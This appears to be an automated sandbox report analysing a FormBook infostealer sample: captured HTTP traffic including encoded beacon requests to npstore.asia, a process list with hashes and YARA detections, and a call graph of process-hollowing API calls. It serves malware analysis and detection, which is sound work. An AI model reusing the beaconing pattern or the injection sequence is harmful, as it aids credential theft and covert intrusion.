4e 65 44 78 76 79 31 78 37 36 45 58 7a 53 50 6a 6c 6e 44 5a 78 33 38 4b 75 38 2f 69 44 33 4d 56 55 6d 38 50 47 66 39 5a 57 41 37 6b 37 4e 58 4f 64 4f 61 41 7a 49 4f 67 2b 7a 61 41 4d 5a 37 47 56 45 73 6f 32 41 70 4f 31 41 64 70 44 38 76 50 41 4f 46 4e 49 46 6f 6c 4f 39 58 49 39 49 79 6b 41 67 50 4d 50 75 7a 49 61 51 30 6b 51 37 34 58 43 53 52 6e 65 34 76 31 58 6a 43 7a 36 67 4d 6d 6c 46 6a 66 38 41 47 50 65 4c 79 4a 6f 66 51 6a 48 6c 30 33 2b 4c 72 52 31 78 34 67 31 59 50 39 73 33 31 39 4f 66 46 6a 77 4b 30 4c 66 52 78 49 46 53 79 30 63 74 4c 33 4d 34 64 31 2b 72 7a 6c 76 59 4b 74 63 6b 48 67 65 41 31 70 42 32 32 39 49 6b 4e 44 54 68 5a 47 2f 41 46 56 4b 72 55 35 49 38 7a 36 48 38 69 30 4d 74 47 37 62 38 39 2f 37 71 32 49 57 72 72 74 63 66 2f 43 41 46 6e 45 5a 49 6b 32 71 2b 75 41 37 78 74 61 39 62 77 58 77 43 4d 33 67 77 38 41 59 6f 45 6e 42 6c 4f 6b 4e 4d 4d 6a 77 44 6a 51 68 4d 67 4c 6f 65 66 4c 76 74 68 75 4b 64 79 37 43 73 31 49 50 6d 72 62 2f 67 39 4b 37 45 70 73 47 74 74 6a 65 49 6c 34 50 41 51 68 30 49 58 58 66 32 57 72 74 74 71 2b 63 49 2b 73 62 6f 72 4b 4a 75 30 50 4b 6f 55 45 4a 70 71 2f 4c 36 65 45 66 74 4f 72 70 48 73 72 57 78 6e 4d 61 53 4d 6c 31 2b 66 79 61 73 2f 58 61 64 6b 68 48 39 62 37 5a 36 63 2b 6b 61 47 49 48 64 56 45 78 65 49 62 35 33 6c 45 4f 75 46 4a 62 78 46 57 43 78 77 4d 54 48 57 70 32 61 33 4a 4e 78 4a 69 6b 72 2b 4b 47 4f 6f 65 4a 56 4c 63 70 4f 47 74 44 50 49 45 53 6e 6b 42 45 6f 6c 6f 4d 2b 32 77 6b 59 59 61 38 49 6b 79 59 47 57 48 48 46 59 4d 32 4e 49 76 65 45 2b 5a 41 73 33 56 38 6d 68 6b 6a 38 53 31 68 66 34 34 49 4b 76 72 68 68 44 43 7a 46 78 64 68 76 34 66 61 33 4a 4c 4b 4d 37 6f 4d 6f 51 62 48 44 63 6a 4f 70 72 75 36 78 5a 2f 33 66 46 63 51 5a 65 55 38 73 61 62 35 63 36 39 45 32 59 59 4e 69 67 76 66 6b 39 53 4b 7a 65 38 6c 59 50 61 4f 4f 2f 46 30 4a 4b 54 36 54 51 75 49 72 52 73 32 44 38 38 45 79 55 44 47 4d 70 6e 6b 72 4c 6a 50 41 58 44 55 45 51 65 63 63 67 2f 31 72 50 75 4e 30 41 64 4d 32 32 6d 4f 75 63 4c 4c 50 2b 6c 57 77 48 50 42 52 4b 73 43 54 47 64 6a 68 75 30 70 4e 50 56 46 44 74 36 59 56 48 45 32 56 37 5a 76 46 41 51 59 74 77 50 4b 4c 57 67 57 76 43 5a 74 64 71 64 6c 75 6a 54 4a 41 4f 6a 5a 64 68 41 38 77 64 62 43 4a 67 31 49 67 46 50 4c 4d 68 50 54 74 52 59 50 74 44 2b 6d 50 43 47 54 6d 33 68 2f 37 36 58 4f 61 37 50 54 41 67 4b 4c 48 64 79 69 51 37 6f 70 66 4c 73 52 41 6a 2f 42 71 35 31 68 46 53 35 4e 75 78 39 43 72 6a 67 52 37 30 4a 47 30 33 37 6d 65 66 65 69 4a 35 41 78 44 73 54 77 65 63 2b 41 50 37 31 6e 46 2f 43 64 65 72 43 45 6d 71 71 68 75 66 36 41 71 65 54 4d 74 67 67 52 34 69 31 51 75 33 70 56 4c 53 47 35 37 4c 45 5a 32 76 72 76 76 65 59 71 78 68
                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:53:53.798593044 CET363INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:53 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.npstore.asia/ahec/
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            56192.168.2.44979652.220.48.161805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:57.335622072 CET469OUTGET /ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnL0rM/85NSIBYnKSu3X+covYz9Y5Yt4Y8akrMm9Q==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.npstore.asia
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:53:57.689404964 CET488INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:57 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.npstore.asia/ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnL0rM/85NSIBYnKSu3X+covYz9Y5Yt4Y8akrMm9Q==&l4xX=rDStpH0He
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:14:49:54
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            Imagebase:0xa60000
                                                                                                                                                            File size:786'432 bytes
                                                                                                                                                            MD5 hash:26C7731786626894CE4FCC339951A26B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:14:49:56
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            Imagebase:0x9d0000
                                                                                                                                                            File size:786'432 bytes
                                                                                                                                                            MD5 hash:26C7731786626894CE4FCC339951A26B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:14:49:59
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe"
                                                                                                                                                            Imagebase:0xa0000
                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:false

                                                                                                                                                            General

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:14:50:01
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\isoburn.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\isoburn.exe
                                                                                                                                                            Imagebase:0x1e0000
                                                                                                                                                            File size:107'008 bytes
                                                                                                                                                            MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:false

                                                                                                                                                            General

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:14:50:12
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe"
                                                                                                                                                            Imagebase:0xa0000
                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:false

                                                                                                                                                            General

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:14:50:24
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Disassembly

                                                                                                                                                            Reset < >

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:8%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:187
                                                                                                                                                              Total number of Limit Nodes:9
                                                                                                                                                              execution_graph 37741 2db9348 37743 2db92fc 37741->37743 37742 2db93f4 37743->37742 37745 2db95a8 37743->37745 37747 2db95ac 37745->37747 37746 2db968e 37746->37742 37747->37746 37757 2db9ada 37747->37757 37764 2db98b6 37747->37764 37772 2db9c10 37747->37772 37776 2db9820 37747->37776 37784 2db9830 37747->37784 37792 2db9bb2 37747->37792 37800 2db9b6e 37747->37800 37805 2db9b69 37747->37805 37748 2db96d5 37748->37742 37810 2db8cd8 37757->37810 37814 2db8cd3 37757->37814 37758 2db9afa 37759 2db9a99 37758->37759 37762 2db8cd8 WriteProcessMemory 37758->37762 37763 2db8cd3 WriteProcessMemory 37758->37763 37759->37748 37762->37759 37763->37759 37765 2db985d 37764->37765 37767 2db9880 37765->37767 37818 2db8f60 37765->37818 37822 2db8f54 37765->37822 37767->37748 37835 2db8dc8 37772->37835 37839 2db8dc3 37772->37839 37773 2db99fd 37773->37748 37777 2db9828 37776->37777 37779 2db9880 37777->37779 37780 2db8f60 CreateProcessA 37777->37780 37781 2db8f54 CreateProcessA 37777->37781 37778 2db9925 37778->37779 37782 2db8b38 Wow64SetThreadContext 37778->37782 37783 2db8b40 Wow64SetThreadContext 37778->37783 37779->37748 37780->37778 37781->37778 37782->37779 37783->37779 37785 2db985d 37784->37785 37787 2db9880 37785->37787 37790 2db8f60 CreateProcessA 37785->37790 37791 2db8f54 CreateProcessA 37785->37791 37786 2db9925 37786->37787 37788 2db8b38 Wow64SetThreadContext 37786->37788 37789 2db8b40 Wow64SetThreadContext 37786->37789 37787->37748 37788->37787 37789->37787 37790->37786 37791->37786 37793 2db9880 37792->37793 37794 2db9bc4 37792->37794 37793->37748 37796 2db8b38 Wow64SetThreadContext 37794->37796 37797 2db8b40 Wow64SetThreadContext 37794->37797 37795 2db9bdc 37795->37793 37844 2db8a88 37795->37844 37849 2db8a90 37795->37849 37796->37795 37797->37795 37801 2db9cae 37800->37801 37802 2db9a31 37801->37802 37803 2db8cd8 WriteProcessMemory 37801->37803 37804 2db8cd3 WriteProcessMemory 37801->37804 37802->37748 37803->37801 37804->37801 37806 2db9b8a 37805->37806 37853 2db8c18 37806->37853 37857 2db8c13 37806->37857 37807 2db9a7f 37807->37748 37811 2db8d20 WriteProcessMemory 37810->37811 37813 2db8d77 37811->37813 37813->37758 37815 2db8d20 WriteProcessMemory 37814->37815 37817 2db8d77 37815->37817 37817->37758 37819 2db8fe9 37818->37819 37819->37819 37820 2db914e CreateProcessA 37819->37820 37821 2db91ab 37820->37821 37821->37821 37824 2db8f58 37822->37824 37823 2db8f38 37823->37767 37827 2db8b38 37823->37827 37831 2db8b40 37823->37831 37824->37823 37825 2db914e CreateProcessA 37824->37825 37826 2db91ab 37825->37826 37826->37826 37828 2db8b85 Wow64SetThreadContext 37827->37828 37830 2db8bcd 37828->37830 37830->37767 37832 2db8b85 Wow64SetThreadContext 37831->37832 37834 2db8bcd 37832->37834 37834->37767 37836 2db8e13 ReadProcessMemory 37835->37836 37838 2db8e57 37836->37838 37838->37773 37840 2db8da0 37839->37840 37841 2db8dc7 ReadProcessMemory 37839->37841 37840->37773 37843 2db8e57 37841->37843 37843->37773 37845 2db8a8c 37844->37845 37846 2db8a6c 37845->37846 37847 2db8ada ResumeThread 37845->37847 37846->37793 37848 2db8b01 37847->37848 37848->37793 37850 2db8ad0 ResumeThread 37849->37850 37852 2db8b01 37850->37852 37852->37793 37854 2db8c58 VirtualAllocEx 37853->37854 37856 2db8c95 37854->37856 37856->37807 37858 2db8c58 VirtualAllocEx 37857->37858 37860 2db8c95 37858->37860 37860->37807 37875 2dba238 37876 2dba3c3 37875->37876 37878 2dba25e 37875->37878 37878->37876 37879 2db9e34 37878->37879 37880 2dba4b8 PostMessageW 37879->37880 37881 2dba524 37880->37881 37881->37878 37638 2e34668 37639 2e3467a 37638->37639 37640 2e34686 37639->37640 37644 2e34779 37639->37644 37649 2e341f4 37640->37649 37642 2e346a5 37645 2e3479d 37644->37645 37653 2e34c90 37645->37653 37657 2e34c80 37645->37657 37650 2e341ff 37649->37650 37665 2e37118 37650->37665 37652 2e37a7f 37652->37642 37654 2e34cb7 37653->37654 37655 2e34d94 37654->37655 37661 2e34638 37654->37661 37659 2e34c90 37657->37659 37658 2e34d94 37659->37658 37660 2e34638 CreateActCtxA 37659->37660 37660->37658 37662 2e35d20 CreateActCtxA 37661->37662 37664 2e35de3 37662->37664 37666 2e37123 37665->37666 37669 2e37138 37666->37669 37668 2e37b4d 37668->37652 37670 2e37143 37669->37670 37673 2e37168 37670->37673 37672 2e37c22 37672->37668 37674 2e37173 37673->37674 37677 2e37198 37674->37677 37676 2e37d25 37676->37672 37678 2e371a3 37677->37678 37680 2e39113 37678->37680 37684 2e3b7c0 37678->37684 37679 2e39151 37679->37676 37680->37679 37688 2e3d8a0 37680->37688 37693 2e3d8b0 37680->37693 37698 2e3b7e9 37684->37698 37702 2e3b7f8 37684->37702 37685 2e3b7d6 37685->37680 37690 2e3d8b0 37688->37690 37689 2e3d8f5 37689->37679 37690->37689 37725 2e3da51 37690->37725 37729 2e3da60 37690->37729 37694 2e3d8d1 37693->37694 37695 2e3d8f5 37694->37695 37696 2e3da51 2 API calls 37694->37696 37697 2e3da60 2 API calls 37694->37697 37695->37679 37696->37695 37697->37695 37699 2e3b7f2 37698->37699 37700 2e3b807 37698->37700 37705 2e3b8e0 37699->37705 37700->37685 37704 2e3b8e0 2 